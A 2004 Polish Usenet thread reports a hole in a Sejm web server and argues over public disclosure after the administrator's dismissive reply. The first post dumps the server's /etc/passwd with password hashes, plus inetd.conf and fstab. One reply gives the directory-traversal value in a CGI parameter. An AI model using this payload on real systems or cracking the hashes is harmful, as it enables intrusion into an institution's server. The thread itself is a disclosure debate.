sejm.gov.pl -- dziurawy ! Admin obojętny.
zYm3N
Jakiś czas temu - 2004-06-07 - na grupie dyskusyjnej alt.pl.comp.os.hacking
powiadomiłem użytkowników usenetu o znalezionej przeze mnie dziurze w
serwerach sejmu. Sprawa jednak przycichła, a sama dziura jak byla, nadal
istnieje. Nie wiem do kogo zwrócić się z *prośbą* o załatanie tego buga, bo
administrator jak widać ma to najwyraźniej w *głębokim poważaniu*. Nie chcę
robić z tego aferty medialnej, ale jeśli nie będzie żadnej reakcji ze
strony administratora serwera - a aktualnie jest ona przynajmniej śmieszna
- napiszę do jednej czy drugiej gazety...
Poniżej zamieszczam posta z w/w dnia. Może ktoś z was wie, co z tym zrobić?
Do kogo napisać?
"
Witam !
w zwiazku z bardzo interesujaca odpowiedzia administratora serwera
pozwalam sobie opublikowac ponizej informacje na temat serwera. Moze to
sprawi, ze nastapi jakas zmiana stanu rzeczy...
Kawalek mojego maila:
"A wiec tak...
/etc/passwd
root:Gsk4Riel5Z1Xg:0:3::/home/pms/:/sbin/sh
daemon:*:1:5::/:/sbin/sh
bin:*:2:2::/usr/bin:/sbin/sh
sys:*:3:3::/:
adm:*:4:4::/var/adm:/sbin/sh
uucp:*:5:3::/var/spool/uucppublic:/usr/lbin/uucp/uucico
lp:*:9:7::/var/spool/lp:/sbin/sh
nuucp:*:11:11::/var/spool/uucppublic:/usr/lbin/uucp/uucico
hpdb:*:27:1:ALLBASE:/:/sbin/sh
www:*:30:1::/:
smbnull:*:101:101:DO NOT USE OR DELETE - needed by
Samba:/home/smbnull:/sbin/sh
guest::102:20:,,,:/home/guest:/usr/bin/csh
ftp:*:500:1:Anonymous FTP user:/home/ftp:/usr/bin/false
pms:Y/OxnABlzNdCw:103:20:,,,:/home/pms:/usr/bin/sh
media:fACvWeGdgWi3E:105:20:,,,:/home/media:/usr/bin/sh
topicdba:bkkpsiyw0HayM:106:102:,,,:/topic/home/topicdba:/usr/bin/csh
topicuse:xpxzO3/0Kj.FE:107:102:,,,:/topic/home/topicuse:/usr/bin/sh
topicdat:YpKheZ9AW224s:104:102:,,,:/topic/home/topicdat:/usr/bin/csh
wisia:ZjRzFicDUS3g6:108:20::/home/wisia:/sbin/sh
/etc/issue
GenericSysName [HP Release B.11.00] (see /etc/issue)
/etc/inetd.conf
## Configured using SAM by root on Mon Oct 15 09:18:47 2001
##
#
# @(#)inetd.conf $Revision: 1.24.214.3 $ $Date: 97/09/10 14:50:49 $
#
# Inetd reads its configuration information from this file upon execution
# and at some later time if it is reconfigured.
#
# A line in the configuration file has the following fields separated by
# tabs and/or spaces:
#
# service name as in /etc/services
# socket type either "stream" or "dgram"
# protocol as in /etc/protocols
# wait/nowait only applies to datagram sockets, stream
# sockets should specify nowait
# user name of user as whom the server should run
# server program absolute pathname for the server inetd
will # execute
# server program args. arguments server program uses as they
normally
# are starting with argv[0] which is the
name of
# the server.
#
# See the inetd.conf(4) manual page for more information.
##
##
#
# ARPA/Berkeley services
#
##
ftp stream tcp nowait root /usr/lbin/ftpd ftpd -l
telnet stream tcp nowait root /usr/lbin/telnetd telnetd
# Before uncommenting the "tftp" entry below, please make sure
# that you have a "tftp" user in /etc/passwd. If you don't
# have one, please consult the tftpd(1M) manual entry for
# information about setting up this service.
tftp dgram udp wait root /usr/lbin/tftpd tftpd\
/opt/ignite\
/var/opt/ignite
#bootps dgram udp wait root /usr/lbin/bootpd bootpd
#finger stream tcp nowait bin /usr/lbin/fingerd fingerd
login stream tcp nowait root /usr/lbin/rlogind rlogind
shell stream tcp nowait root /usr/lbin/remshd remshd
exec stream tcp nowait root /usr/lbin/rexecd rexecd
#uucp stream tcp nowait root /usr/sbin/uucpd uucpd
ntalk dgram udp wait root /usr/lbin/ntalkd ntalkd
ident stream tcp wait bin /usr/lbin/identd identd
##
#
# Other HP-UX network services
#
##
printer stream tcp nowait root /usr/sbin/rlpdaemon rlpdaemon -i
##
#
# inetd internal services
#
##
daytime stream tcp nowait root internal
daytime dgram udp nowait root internal
time stream tcp nowait root internal
#time dgram udp nowait root internal
echo stream tcp nowait root internal
echo dgram udp nowait root internal
discard stream tcp nowait root internal
discard dgram udp nowait root internal
chargen stream tcp nowait root internal
chargen dgram udp nowait root internal
##
#
# rpc services, registered by inetd with portmap
# Do not uncomment these unless your system is running portmap!
#
##
# WARNING: The rpc.mountd should now be started from a startup script.
# Please enable the mountd startup script to start rpc.mountd.
##
#rpc stream tcp nowait root /usr/sbin/rpc.rexd 100017 1
rpc.rexd
#rpc dgram udp wait root /usr/lib/netsvc/rstat/rpc.rstatd
100001 2-4 rpc.rstatd
#rpc dgram udp wait root /usr/lib/netsvc/rusers/rpc.rusersd
100002 1-2 rpc.rusersd
#rpc dgram udp wait root /usr/lib/netsvc/rwall/rpc.rwalld
100008 1 rpc.rwalld
#rpc dgram udp wait root /usr/sbin/rpc.rquotad 100011 1
rpc.rquotad
#rpc dgram udp wait root /usr/lib/netsvc/spray/rpc.sprayd
100012 1 rpc.sprayd
##
#
# The standard remshd and rlogind do not include the Kerberized
# code. You must install the InternetSvcSec/INETSVCS-SEC fileset and
# configure Kerberos as described in the SIS(5) man page.
#
##
kshell stream tcp nowait root /usr/lbin/remshd remshd -K
klogin stream tcp nowait root /usr/lbin/rlogind rlogind -K
##
#
# NCPM programs.
# Do not uncomment these unless you are using NCPM.
#
##
#ncpm-pm dgram udp wait root /opt/ncpm/bin/ncpmd ncpmd
#ncpm-hip dgram udp wait root /opt/ncpm/bin/hipd hipd
dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
rpc xti tcp swait root /usr/dt/bin/rpc.ttdbserver 100083 1
/usr/dt/bin/rpc.ttdbserver
rpc dgram udp wait root /usr/dt/bin/rpc.cmsd 100068 2-5 rpc.cmsd
recserv stream tcp nowait root /usr/lbin/recserv recserv -display :0
swat stream tcp nowait.400 root /opt/samba/bin/swat swat
registrar stream tcp nowait root /etc/opt/resmon/lbin/registrar
/etc/opt/resmon/lbin/registrar
/etc/fstab
/dev/vg00/lvol3 / vxfs delaylog 0 1
/dev/vg00/lvol1 /stand hfs defaults 0 1
/dev/vg00/lvol4 /tmp vxfs delaylog 0 2
/dev/vg00/lvol6 /opt vxfs delaylog 0 2
/dev/vg00/lvol7 /usr vxfs delaylog 0 2
/dev/vg00/lvol8 /var vxfs delaylog 0 2
/dev/vg00/lvol5 /topic vxfs rw,suid,nolargefiles,delaylog,datainlog 0 2
instl_boots dgram udp wait root /opt/ignite/lbin/instl_bootd instl_bootd
mpokul:It1kgwtctdHjI:109:20:,,,:/home/mpokul:/usr/bin/sh
............
moge reszty nie pokazywac ? Nie chce mi sie/nie mam czasu/nie chce zeby
to bylo traktowane, jak proba wlamu.
Po prostu chce pokazac, ze nie mowie nieprawdy.
Ktos z tworcow skryptu nawalil.. i to nawalil porzadnie....."
Odpowiedz administratora:
"Mysle ze jednak jeszcze daleko do przejecia kontroli. Wiem ze jest stary
Apache ale tak musi zostac. Przynajmniej mozna epatwoac mozliwoscia
bejrzenia
/etc/passwd i paru innych. Dziekuje za zainteresowanie. Byc moze kiedys uda
sie zmienic wersje co nie jest proste ze wzgldu na licencje zwiazane z
Verity.
Zwykle odzywaja sie problemy z zakupem nowych wersji i tak musi poki co
pozostac. "
skoro to jest dalekie od przejecia kontroli, to mysle, ze nikomu nie
zaszkodzi opublikowanie tych informacji.
Zycze milego wieczorka.
pozdrawiam.
zYm3N
"
link do posta: http://tinyurl.com/6lulq
ps. Wie ktoś może jak jest z ujawnianiem korespondencji prywatnej ? Nie
chcę być posądzony o łamanie prawa.. Jeśli dostanę linki do § Polskiego
Prawa, to umieszczę tutaj te kilka maili administratora sejm.gov.pl.
--
zYm3N[@interia.pl]
.:: C++ | C | PHP | HTML | Delphi | Pascal
.:: >> http://zymen.net <<
.:: http://zymen.net/cytowanie.htm
Krystek
> Jakiś czas temu - 2004-06-07 - na grupie dyskusyjnej
> alt.pl.comp.os.hacking powiadomiłem użytkowników usenetu o
> znalezionej przeze mnie dziurze w serwerach sejmu. Sprawa jednak
> przycichła, a sama dziura jak byla, nadal istnieje. Nie wiem do kogo
> zwrócić się z *prośbą* o załatanie tego buga, bo administrator jak
> widać ma to najwyraźniej w *głębokim poważaniu*. Nie chcę robić z
> administratora serwera - a aktualnie jest ona przynajmniej śmieszna -
> napiszę do jednej czy drugiej gazety...
Ale czym Ty się przejmujesz. Skoro (l)admin ma Twoje rady głeboko gdzieś
to nie widzę powodu dla jego trwania w błogiej niewiedzy i
szczęśliwości. Może ktoś w końcu to nagłośni i wtedy będzie musiał się
tłumaczyć. Ja bym to od razu dał do "Faktu" i TVN, z informacją, że
admin był wielokrotnie informowany o problemie, ale nie zrobił nic.
Ciekawe jak (i czy w ogóle) tłumaczyłby się mediom. O ile nie straciłby
z tego powodu pracy.
K.
OGONek~
Użytkownik "Krystek" <kryste...@pl.space.mailbox> napisał w wiadomości >
Ale czym
> Ciekawe jak (i czy w ogóle) tłumaczyłby się mediom. O ile nie straciłby
> z tego powodu pracy.
Tylko po co od razu go wylewac z pracy? Mysle ze trzeba mu dac troche czasu
do namyslu i wyslac maila ze jest (l)adminem i ma czas do powiedzmy 01.09 a
potem zostanie osmieszony w mediach.
--
OGONek~
Krystek
> Tylko po co od razu go wylewac z pracy? Mysle ze trzeba mu dac troche
> czasu do namyslu i wyslac maila ze jest (l)adminem i ma czas do
> powiedzmy 01.09 a potem zostanie osmieszony w mediach.
Nie no, wszystko jasne. Chodziło mi tylko o sytuację, w której autor
wątku nie po raz pierwszy podesłał (l)adminowi informacje o dziurze w
zabezpieczeniach. Jeśli ten go notorycznie zlewa, to chyba czas mu dać
jakieś ultimatum a potem robić swoje...
Pozdrawiam,
K.
Krzysztof Kudłacik
> a potem zostanie osmieszony w mediach.
Hmmm ... co racja to racja. Ale tak naprawdę sprawa tylko pośrednio może
dotyczyć *samego* admina - w jego odpowiedzi jest jakiś wątek 'licencji' a
to już nie jest brocha, a jego przełożonego ... i tym bardziej on, admin,
techniczny itd. dostanie po łapach, jeśli sprawa zyska jakiś rozgłos (w co
wątpię).
--
.:. miniFAQ dla 40tude Dialog http://dialog.born66.net
GH/GP/GSS d- s:+ a38 C++ L+ W+++ N++ K- w O-- M-- PS--- PE+ Y+ PGP+
t--- 5-- X++++ R- b++ DI- D-- G e+++ h---- r+++ z+++
Papik
> Nie no, wszystko jasne. Chodziło mi tylko o sytuację, w której autor
> wątku nie po raz pierwszy podesłał (l)adminowi informacje o dziurze w
> zabezpieczeniach. Jeśli ten go notorycznie zlewa, to chyba czas mu dać
> jakieś ultimatum a potem robić swoje...
IMHO admin ma zwiazane rece, ma robic swoje lub to co mu kaza a kazdy ruch z
jego strony moze byc odgornie spychany, bo niesie za soba potrzebe wydania
kasy (owa licencja)..
No ale dziwi mnie tez faktze owy program z licencja *MUSI* dzialac wylacznie
ze stara wersja apache :o Apache jest AFAIR darmowym softem...
Zreszta za malo danych aby gdybac i tyle...
--
* zycie zaczyna sie po 30. ale tez przed 30. moze sie skonczyc *
PAPIK - Positronic Android Programmed for Infiltration and Killing
GG: 70701
Adam Kondrat
Użytkownik "zYm3N" <zy...@interia.pl> napisał w wiadomości
news:k6aq9ktravus$.zy2t401bd897$.dlg@40tude.net...
> root:Gsk4Riel5Z1Xg:0:3::/home/pms/:/sbin/sh
Takjak pisales chodzi o podstawienie URL
ResultTemplate=../../../../../../../../../../../../../../../../etc/passwd
Winny tu jest twórca tego skryptu CGI, natomiast admin powinien to
zablokować (nawet przez config apache) I mysle ze udaloby sie to.
Tak, czy inaczej, to lame, ze hasła nie sa w shadow
Adam Kondrat
Użytkownik "zYm3N" <zy...@interia.pl> napisał w wiadomości
news:k6aq9ktravus$.zy2t401bd897$.dlg@40tude.net...
> serwerach sejmu. Sprawa jednak przycichła, a sama dziura jak byla, nadal
> istnieje. Nie wiem do kogo zwrócić się z *prośbą* o załatanie tego buga,
bo
Dziura banalna - kiedys mialem podobny przypadek(jeszcze bardziej lame -
mogłem odpalić dowolny kod z prawami serwera). Napisalem info do admina,
nawet nie odpisał
http://arbiter.pl/img/zonk-wirt-krakow.gif
Ale dziure załatał:)
Pawel Kierski
news:slrnchunn3.nt3...@cocoon.acn.waw.pl napisał(a):
[...]
> IMHO admin ma zwiazane rece, ma robic swoje lub to co mu kaza a kazdy
> ruch z jego strony moze byc odgornie spychany, bo niesie za soba potrzebe
> wydania kasy (owa licencja)..
> wylacznie ze stara wersja apache :o Apache jest AFAIR darmowym softem...
> Zreszta za malo danych aby gdybac i tyle...
Ale ultimatum daje mu szansę sporządzenia odpowiedniej notatki
służbowej, czy jak to się tam nazywa, opisującej sytuację,
i przestawienie jej swoim decydentom. Wtedy w mediach na debili
wyjdą decydenci, nie on. Aha - taką notatkę w dwóch egzemplarzach,
przedstawiając prosi się o podpis z datą, pod słówkiem "otrzymałem"
na swojej kopi.
--
Paweł Kierski
pkie...@mks.com.pl
dodaj "[nomorespam]" w temacie jeśli piszesz z domeny innej niż .pl,
albo koniecznie chcesz obejść moje filtry 8-)
Grzegorz Krzemieniecki
> w zwiazku z bardzo interesujaca odpowiedzia administratora serwera
> pozwalam sobie opublikowac ponizej informacje na temat serwera. Moze to
> sprawi, ze nastapi jakas zmiana stanu rzeczy...
> Odpowiedz administratora:
> "Mysle ze jednak jeszcze daleko do przejecia kontroli. Wiem ze jest stary
> Apache ale tak musi zostac. Przynajmniej mozna epatwoac mozliwoscia
> bejrzenia
> /etc/passwd i paru innych. Dziekuje za zainteresowanie. Byc moze kiedys uda
> sie zmienic wersje co nie jest proste ze wzgldu na licencje zwiazane z
> Verity.
> Zwykle odzywaja sie problemy z zakupem nowych wersji i tak musi poki co
> pozostac. "
> skoro to jest dalekie od przejecia kontroli, to mysle, ze nikomu nie
> zaszkodzi opublikowanie tych informacji.
Myślę, że pod tym adresem znajdzie Pan właściwą osobę do poinformowania o całej
sprawie: http://www.sejm.gov.pl/kancelaria/podstrony/oi.htm
--
Wysłano z serwisu OnetNiusy: http://niusy.onet.pl
zYm3N
> Myślę, że pod tym adresem znajdzie Pan właściwą osobę do poinformowania o całej
> sprawie: http://www.sejm.gov.pl/kancelaria/podstrony/oi.htm
Dzięki, info poszło.
Małgorzata Krzyżaniak
wiadomość z adresu <zy...@interia.pl> i powiedziała:
> skoro to jest dalekie od przejecia kontroli, to mysle, ze nikomu nie
> zaszkodzi opublikowanie tych informacji.
A tak w zasadzie, to czemu tego nie olejesz, skoro im nie zależy? Jakaś
misja dziejowa?
Zuzanka
--
.:*Z*:._.:*U*:._.:*Z*:._.:*A*:._.:*N*:._.:*K*:._.:*A*:.
Małgorzata Krzyżaniak ..... http://www.pawnhearts.eu.org/~zuzanka/
Powinno się wystawić Cię w Sevres jako wzorzec cynizmu ;-) (C) Tib
zYm3N
spłodził(a):
>> skoro to jest dalekie od przejecia kontroli, to mysle, ze nikomu nie
>> zaszkodzi opublikowanie tych informacji.
>
> A tak w zasadzie, to czemu tego nie olejesz, skoro im nie zależy? Jakaś
> misja dziejowa?
Bo to serwer krajowy. Lubię pomagać. No i domenka gov.pl :] Mała mgiełka
tajemnicy :-)
Małgorzata Krzyżaniak
wiadomość z adresu <zy...@interia.pl> i powiedziała:
> Bo to serwer krajowy. Lubię pomagać. No i domenka gov.pl :] Mała mgiełka
> tajemnicy :-)
No jakoś tekst postingu na chęć pomocy nie wskazują. Chyba że taka pomoc na siłę...
zYm3N
spłodził(a):
>> Bo to serwer krajowy. Lubię pomagać. No i domenka gov.pl :] Mała mgiełka
>> tajemnicy :-)
>
> No jakoś tekst postingu na chęć pomocy nie wskazują. Chyba że taka pomoc na siłę...
Nie zrozumiałaś.
Przeczytaj wiadomość pierwszą i zobacz co tam jest.. :] Napisałem, że na
odpowiedź administratora czekałem dość długo.., że opisałem mu sprawę
porządnie i szczegółowo.. a jednak zero odpowiedzi.. dlatego tutaj
wysłałem.. i muszę przyznać, że odniosło to skutek.. jakiś.. :]
Małgorzata Krzyżaniak
wiadomość z adresu <zy...@interia.pl> i powiedziała:
> Nie zrozumiałaś.
Tak. Dlatego pytam.
> Przeczytaj wiadomość pierwszą i zobacz co tam jest.. :] Napisałem, że na
> odpowiedź administratora czekałem dość długo.., że opisałem mu sprawę
> porządnie i szczegółowo.. a jednak zero odpowiedzi.. dlatego tutaj
^^^^^^^^^^^^^^^^^^^^^^^^
> wysłałem.. i muszę przyznać, że odniosło to skutek.. jakiś.. :]
Czyli na siłę. Skoro nie odpowiedział, to nie prościej przestać pomagać?
OGONek~
> Czyli na siłę. Skoro nie odpowiedział, to nie prościej przestać
> pomagać? Zuzanka
Jednak to server polskiego Sejmu. Wiec przykro by bylo gdyby tam
porno-strony sie pojawily.
Zauwazylem u Ciebie chec czepiania sie do wszystkiego.
Przykre...
--
OGONek~
Ola Michnowicz
Małgorzata Krzyżaniak napisał(a):
> Czyli na siłę. Skoro nie odpowiedział, to nie prościej przestać pomagać?
Tylko, że to nie jest prywatny serwer sieci trzepak z Koziej Wólki, a
serwer naszego Sejmu. Ciała (jakoby) reprezentującego Naród. Czyli, w
pewnym sensie, wizytówka wszystkich ludzi z polskim paszportem. Nie wiem
jak Tobie, ale mnie byłoby ciut głupio, gdyby jutro pojawiła się tam
wywieszka "hacked by gumisie" i link do strony z pornografią dziecięcą.
Tak, wiem, patriotyzm i takie tam podobne zdecydowanie nie są cool w
dzisiejszych czasach... ale bądź wyrozumiała i okaż trochę tolerancji
dla dinozaurów.
--
/)
/\___/\ (( Alex <kotek[at]chemistry[dot]pl>
\`@_@'/ )) prześliczne kocięta szukają domu:
{=:Y:=}_// http://alex.chemistry.pl/kociaki/
-{_}^-'{_}-------------------------------------
Małgorzata Krzyżaniak
wiadomość z adresu <spam...@dioda.net> i powiedziała:
> Tak, wiem, patriotyzm i takie tam podobne zdecydowanie nie są cool w
> dzisiejszych czasach... ale bądź wyrozumiała i okaż trochę tolerancji
> dla dinozaurów.
Zasadniczy problem jest taki, że ja nijak tej jakże chwalebnej postawy
opisanej przez Ciebie u inicjatora wątku nie widzę. Raczej "Znalazłem
>>dziurę<<, a jak nie poprawicie, to Wam narobię trzody"... Ale
moja chata z kraja, widać fajnie być chackerem ;-)
Miros/law L. Baran
> Wed, 18 Aug 2004 06:12:54 +0000 (UTC), na pl.internet.mordplik,
> Małgorzata Krzyżaniak napisał(a):
> > Czyli na siłę. Skoro nie odpowiedział, to nie prościej przestać pomagać?
> Tylko, że to nie jest prywatny serwer sieci trzepak z Koziej Wólki, a
> serwer naszego Sejmu. Ciała (jakoby) reprezentującego Naród. Czyli, w
> pewnym sensie, wizytówka wszystkich ludzi z polskim paszportem. Nie wiem
> jak Tobie, ale mnie byłoby ciut głupio, gdyby jutro pojawiła się tam
> wywieszka "hacked by gumisie" i link do strony z pornografią dziecięcą.
Koniec Polski Niepodległej, co? A <http://www.whitehouse.com/> to
zapewne powinno być zakazane? :->
> Tak, wiem, patriotyzm i takie tam podobne zdecydowanie nie są cool w
> dzisiejszych czasach... ale bądź wyrozumiała i okaż trochę tolerancji
> dla dinozaurów.
Uch, och. Dinozaurów. Jak to pięknie brzmi. Miło mi poznać prawdziwą
PPI.
Jubal
--
[ Miros/law L Baran, baran-at-knm-org-pl, neg IQ, cert AI ] [ 0101010 is ]
[ BOF2510053411, makabra.knm.org.pl/~baran/, alchemy pany ] [ The Answer ]
Anything worth doing is worth overdoing
Małgorzata Krzyżaniak
wiadomość z adresu <spam...@wszystkich.krajow.p#^&*> i powiedziała:
> Jednak to server polskiego Sejmu. Wiec przykro by bylo gdyby tam
> porno-strony sie pojawily.
No, jakże aktywne upublicznianie >>dziury<< jest niejako zachętą do
takich zabaw.
> Zauwazylem u Ciebie chec czepiania sie do wszystkiego.
> Przykre...
Mnie to nie przeszkadza, ale dzięki za spychoanalizę ;-)
Arkadiusz 'nare' Kindziuk
>> Jednak to server polskiego Sejmu. Wiec przykro by bylo gdyby tam
>> porno-strony sie pojawily.
>
> No, jakże aktywne upublicznianie >>dziury<< jest niejako zachętą do
> takich zabaw.
upublicznianiem. Zachętą do takich zabaw to raczej jest niełatanie dziur.
--
Arkadiusz Kindziuk
Małgorzata Krzyżaniak
wiadomość z adresu <na...@europe.earth.net> i powiedziała:
>> No, jakże aktywne upublicznianie >>dziury<< jest niejako zachętą do
>> takich zabaw.
> Jeżeli po cichu nie poskutkowało, to jestem jak najbardziej za aktywnym
> upublicznianiem. Zachętą do takich zabaw to raczej jest niełatanie dziur.
A ja widzę całą gamę możliwości pomiędzy. Acz nie są one tak widowiskowe
jak ogłaszanie publicznie. Po prostu nie ma dla mnie wynikania, że jeśli
"po cichu nie poskutkowało", to "go public".
Rafał
>>Przeczytaj wiadomość pierwszą i zobacz co tam jest.. :] Napisałem, że na
>>odpowiedź administratora czekałem dość długo.., że opisałem mu sprawę
>>porządnie i szczegółowo.. a jednak zero odpowiedzi.. dlatego tutaj
> ^^^^^^^^^^^^^^^^^^^^^^^^
>>wysłałem.. i muszę przyznać, że odniosło to skutek.. jakiś.. :]
> Czyli na siłę. Skoro nie odpowiedział, to nie prościej przestać pomagać?
Hehe....
gdyby to chodziło o jakąś głupią firmę z pcimia dolnego - być może tak.
Ale w tym przypadku chodzi tu o Sejm Rzeczpospolitej Polskiej, o
godną* reprezentację nas wszystkich - Polaków.
* - pomijając to coś co zasiada w ławach poselskich
Pozdrawiam
Rafał
Arkadiusz 'nare' Kindziuk
>>> No, jakże aktywne upublicznianie >>dziury<< jest niejako zachętą do
>>> takich zabaw.
>> Jeżeli po cichu nie poskutkowało, to jestem jak najbardziej za aktywnym
>> upublicznianiem. Zachętą do takich zabaw to raczej jest niełatanie dziur.
>
> A ja widzę całą gamę możliwości pomiędzy. Acz nie są one tak widowiskowe
> jak ogłaszanie publicznie. Po prostu nie ma dla mnie wynikania, że jeśli
> "po cichu nie poskutkowało", to "go public".
Takie przejście i tak mnie cieszy, bo raz mu się chciało zasugerować poprawę
config'u, dwa imho jest w porządku w stosunku sejm.gov.pl
--
Arkadiusz Kindziuk
Asia Jedrychowska
> Tak, wiem, patriotyzm i takie tam podobne zdecydowanie nie są cool w
> dzisiejszych czasach... ale bądź wyrozumiała i okaż trochę tolerancji
> dla dinozaurów.
www jednego z urzędów miasta, w którym mieszkam. Jako że nie mam zapędów na
wannabe chakiera czy wandala, pooglądałam sobie parę rzeczy "od kuchni",
pośmiałam się z lamerstwa urzędoadminów przez chwilę z najbliższymi osobami
i zostawiłam sprawę w spokoju. Być może powinnam była tam pokasować czy
poprzestawiać parę rzeczy, czy też umieścić coś w rodzaju "0wn3d by asiak",
bo tak by było patriotyczniej? Nie ukrywam, korciło mnie, żeby wysłać info
o dziurze znajomemu pismakowi z bulwarówki, ale wyłącznie z racji czysto
ludzkiej chęci dokopania administracji, która jest mi nie po linii. Nie
mieszałabym do tego patriotyzmu, bo to zalatuje o, taką hipokryzją.
Ad meritum, sprawa w Sejmie zapewne wygląda tak:
- parę lat temu jakaś firma wygrała przetarg na wdrożenie danej aplikacji
www (przy okazji zapomniano zrobić audyt bezpieczeństwa);
- wsparcie aplikacji zapewne się skończyło, bo nie ma na nie kasy;
- dany admin zapewne nie ma dupochronu na dłubanie w tym na własną rękę
(dziwne, zważywszy, że już pewnie wszystkie wannabe chakiery wschodniej
Europy pracowicie dżonują jego hasła, ale jestem sobie w stanie wyobrazić
sytuacje, w których biedne chłopię faktycznie nie ma wiele do powiedzenia,
taka uroda metod zarządzania w działach IT dużych instytucji).
a.
--
-------/-\-$-|-/-\ -- [ Asia Jędrychowska ] - [ asia#echelon.pl ] ---------
<biki> wcale nie wiem czy mi się tu bardziej podoba odkurzone
quem
> Witam !
> Jakiś czas temu - 2004-06-07 - na grupie dyskusyjnej alt.pl.comp.os.hacking
> powiadomiłem użytkowników usenetu o znalezionej przeze mnie dziurze w
> istnieje. Nie wiem do kogo zwrócić się z *prośbą* o załatanie tego buga, bo
> robić z tego aferty medialnej, ale jeśli nie będzie żadnej reakcji ze
> strony administratora serwera - a aktualnie jest ona przynajmniej śmieszna
> - napiszę do jednej czy drugiej gazety...
>
> Poniżej zamieszczam posta z w/w dnia. Może ktoś z was wie, co z tym zrobić?
> Do kogo napisać?
A moze to nie sa dziury tylko takie pulapki na hackerow? Jeszcze pojdziesz
siedziec za te zabawy. :) napisz do jakiejs gazety, najlepiej do Superexpresu
bo GW to raczej zignoruje, i bedziesz slawny ;) a admin siedzi cicho bo
dostal pracę po znajomosci i się boi, ze ją straci jak sie wyda, że jest
ladminem.
--
quem
barboleta
> Ola Michnowicz <spam...@dioda.net> wrote:
> Interesujące, bardzo... A ja kilka dni temu odkryłam dziursko w aplikacji
> www jednego z urzędów miasta, w którym mieszkam. Jako że nie mam zapędów na
> wannabe chakiera czy wandala, pooglądałam sobie parę rzeczy "od kuchni",
> pośmiałam się z lamerstwa urzędoadminów przez chwilę z najbliższymi osobami
> i zostawiłam sprawę w spokoju.
I czujesz sie z tym dobrze. A teraz sobie pomysl, ze jakis skosnooki
(teroretyzuje) chakier, nie bedzie mial tyle sentymentow co ty. Wezmie co
bedzi emogl wziac, zniszczy co bedzi emogl zniszczyc, oflaguje serw jako
zdobyty. Kolejna wiesc obiegnie swiat. A w urzedzie, zamiast zapobiegac niskim
kosztem, rozpeta sie leczenie kosztem wysokim...
> Ad meritum, sprawa w Sejmie zapewne wygląda tak:
> - parę lat temu jakaś firma wygrała przetarg na wdrożenie danej aplikacji
> www (przy okazji zapomniano zrobić audyt bezpieczeństwa);
i z urzedu wydali jakby nie patrzec NASZE pieniadze...
> - wsparcie aplikacji zapewne się skończyło, bo nie ma na nie kasy;
jak to nie ma kasy, przeciez ciagle nam zabieraja NASZE pieniadze...
> - dany admin zapewne nie ma dupochronu na dłubanie w tym na własną rękę
no to niech to zglosi do dyrektora, lacznie z tym, ze zostal np. poinformowany
o zagrozeniu przez przypadkowych uzytkownikow sieci...
madry polak po szkodzie. po wlamaniu ktos poleci (najmniej winny), znajda sie
pieniadze na "zabezpieczenia" od firby X (znajomych tego i owego) i ustawi sie
odpowiedni przetarg... na to co modne... NASZE pieniadze pojda w siny dym,
znaczy sytuacja wroci po 2 miesiacach do takiego stadum jak jest teraz...
po prostu smutek...
--
Wysłano z serwisu Usenet w portalu Gazeta.pl -> http://www.gazeta.pl/usenet/
Robert Rędziak (prawdziwego adresu szukaj w sygnaturce)
<barb...@WYTNIJ.gazeta.pl> wrote:
> I czujesz sie z tym dobrze. A teraz sobie pomysl, ze jakis skosnooki
> (teroretyzuje) chakier, nie bedzie mial tyle sentymentow co ty. Wezmie co
> bedzi emogl wziac, zniszczy co bedzi emogl zniszczyc, oflaguje serw jako
> zdobyty. Kolejna wiesc obiegnie swiat. A w urzedzie, zamiast zapobiegac niskim
> kosztem, rozpeta sie leczenie kosztem wysokim...
Och jej. Normalnie posikałem się w majtki... Dziura była tak
cholernie krytyczna, że dwudzieste pokolenie moich potomków
będzie zapieprzało za darmo u Chińczyków, żeby pokryć straty
naszego kochanego UM.
> i z urzedu wydali jakby nie patrzec NASZE pieniadze...
No i? Wiesz, ile tych pieniędzy jest wydawanych na inne rzeczy,
które bardziej bolą od jakiejś tam dziury?
>> - wsparcie aplikacji zapewne się skończyło, bo nie ma na nie kasy;
>
> jak to nie ma kasy, przeciez ciagle nam zabieraja NASZE pieniadze...
Ty, idź miej pretensje o to do US-u i władz?
>> - dany admin zapewne nie ma dupochronu na dłubanie w tym na własną rękę
>
> no to niech to zglosi do dyrektora, lacznie z tym, ze zostal np. poinformowany
> o zagrozeniu przez przypadkowych uzytkownikow sieci...
Aj waj. Pracowałeś kiedyś w rozrośniętej biurwokracji
(korporacje, instytucje państwowe, etc)?
> madry polak po szkodzie. po wlamaniu ktos poleci (najmniej winny), znajda sie
> pieniadze na "zabezpieczenia" od firby X (znajomych tego i owego) i ustawi sie
> odpowiedni przetarg... na to co modne... NASZE pieniadze pojda w siny dym,
> znaczy sytuacja wroci po 2 miesiacach do takiego stadum jak jest teraz...
A potrafisz temu zapobiec?
> po prostu smutek...
Swe żale skieruj do swego reprezentatna w parlamencie i spróbuj
na nim wymóc działania, aby to poprawić.
r.
--
_________________________________________________________________
robert rędziak K11 jid:rekin-at-jabber-dot-plukwa-dot-net
KlubSubaru.PL mailto:spambox-at-supersonic-dot-plukwa-dot-net
tu kieruj swój spam (tylko spam): fee...@supersonic.plukwa.net
barboleta
<spam_go...@supersonic.plukwa.net> napisał(a):
> Och jej. Normalnie posikałem się w majtki... Dziura była tak
> cholernie krytyczna, że dwudzieste pokolenie moich potomków
> będzie zapieprzało za darmo u Chińczyków, żeby pokryć straty
> naszego kochanego UM.
Kazde straty to straty. Czy to zlotowka, czy 10 mln zlotych, czy 20 minut
dluzej w kolejce w urzedzie to strata. Jesli moge wybrac, to wole ta zlotowke
wydac na np. piwo czy na bezdomnych, niz na naprawianie pomylek i niedopatrzen
"ludzi kompetentnych".
> No i? Wiesz, ile tych pieniędzy jest wydawanych na inne rzeczy,
> które bardziej bolą od jakiejś tam dziury?
Kazde niewlasciwe zagospodarowanie tych pieniedzy boli. Wiec nie rozumiem
Twojego podejscia typu " axuj, jest dziura, no i co, przeciez jest ich 10000
podobnych wszedzie".
> Aj waj. Pracowałeś kiedyś w rozrośniętej biurwokracji
> (korporacje, instytucje państwowe, etc)?
Pracowalem. Ale to nie znaczy ze nie nalezy dazyc do zmiany tego (kilka
brzydkich wyrazow tutaj) systemu. Osobiscie dazylem. Z roznym skutkiem,
przewaznie lichym.
> A potrafisz temu zapobiec?
Odsunac od decyzji ludzi, ktorzy nie potrafia myslec perspektywicznie. Oto
lekarstwo. Recepta jest prosta i dziala od chlewu czy stajni, poprzez urzedy
